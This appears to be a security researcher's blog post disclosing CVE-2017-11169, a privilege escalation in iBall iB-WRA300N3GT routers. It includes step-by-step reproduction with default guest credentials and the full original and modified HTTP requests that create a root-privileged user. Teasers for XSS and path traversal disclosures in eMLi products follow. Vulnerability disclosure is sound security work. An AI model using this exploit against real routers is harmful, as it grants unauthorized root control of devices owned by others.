Skip to main content

Privelege Escalation in iBall iB-WRA300N3GT Devices

By Yash Mehta
         Privilege Escalation on iBall iB-WRA300N3GT (Routers) devices allows remote authenticated users to obtain root privileges by leveraging a guest/user/normal account to submit a modified privilege parameter.

Reproduction Steps:

Step 1 : Logon to Router using Guest privileges. (Default : Username : guest , Password : guest)

Step 2 : Goto Maintenance Tab

Step 3 : Click on Password Tab (On Right Panel)

Step 4 : Enter new user name and password for adding new guest user

Step 5 : Intercept HTTP request

Step 6 : A sample HTTP request will look like following one.

====================HTTP Request Sample=======================
   POST /form2userconfig.cgi HTTP/1.1
   Referer: http://192.168.1.1/userconfig.htm?v=1499683514000
   Cookie: SessionID=
   username=test&privilege=0&newpass=hello&confpass=hello&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

Step 7 : Change privilege parameter from 0 to 2 and forward the HTTP request.
=====================Edited HTTP Request=======================

    POST /form2userconfig.cgi HTTP/1.1
   Referer: http://192.168.1.1/userconfig.htm?v=1499683514000
   Cookie: SessionID=
   username=test&privilege=2&newpass=hello&confpass=hello&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
A new user "test" will be created with root privileges from "guest" account !!

Affected Product : iBall iB-WRA300N3GT
Firmware Version : iB-WRA300N3GT_1.1.1
Vulnerability Type : Insecure Permissions
Vulnerability Impact : Escalation of Privileges

 Timeline: 
25/05/2017 - Vulnerability Found
05/06/2017 - **CVE-2017-11169 Assigned
11/06/2017 - Reported to iBall
23/07/2017 - iBall Customer Support Replied(Escalated Internally)
05/08/2017 - No Response
02/09/2017 - No Response
13/11/2017 - Public Disclosure
Notes :

  • **The Common Vulnerabilities and Exposures (CVE) project has assigned the ID CVE-2017-11169 to this issue. This is an entry on the CVE List, which standardizes names for security problems.
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11169
  • CVE ID: CVE- 2017-11169
  • In case of any doubts please contact me on unqdrms [at] gmail [dot] com
Labels:

Comments

Post a Comment

Popular posts from this blog

XSS Vulnerability in Multiple eMLi Products

By Yash Mehta
                   Cross Site Scripting Vuulnerability in core-eMLi in eMLi V1.0 allows an Attacker to send malicious code, generally in the form of a browser-side script, to a different end user.   What is Cross Site Scripting ?               Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Impact Scenario :        1. Account Hijacking      2. Website Defacement      3. Stealing Credentials      4. Sensitive Data Leak Affected Versions :                       eMLi : School Management - 1.0                eMLi : College Ca
Read more

Path Traversal Vulnerability in eMLi Portal [CVE-2017-7258]

By Yash Mehta
            Hello Everyone,  This is my first vulnerability disclosure in public. I f you have any suggestions regarding this feel free to    email me.               HTTP Exploit in eMLi Portal allows an Attacker to View Restricted Information or (even more seriously) Execute powerful commands on the web server which can lead to a full compromise of the system via Directory Path Traversal.          What is Directory Path Traversal ?              A Directory Path Traversal attack aims to access files and directories that are stored on Web Server.  By manipulating file paths, it is possible to access arbitrary files, Application Source Code, System Configurations and Critical System Files.      Impact Scenario:                 A remote attacker is able to download critical files from eMLi Web Server such as core-emli/Storage, configuration files and log files which may result in " Sensitive Information Disclosure"  and may also allow the attacker to car
Read more